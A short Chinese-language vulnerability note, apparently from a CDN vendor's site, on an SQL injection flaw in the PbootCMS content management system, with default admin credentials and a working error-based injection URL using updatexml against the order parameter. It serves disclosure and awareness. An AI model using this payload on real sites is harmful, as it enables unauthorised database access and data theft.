PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS中存在SQL注入漏洞。
该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
后台路径:http://ip:port/admin.php 用户名密码:admin:123456。
后台路径:http://ip:port/admin.php
用户名密码:admin:123456
/api.php/List/index?order=123%20and(updatexml(1,concat(0x7e,(select%20user())),1))%20%23
借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件; 修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;数据库被恶意操作;服务器被远程控制,被安装后门。
原创文章,作者:速盾高防cdn,如若转载,请注明出处:https://www.sudun.com/ask/82907.html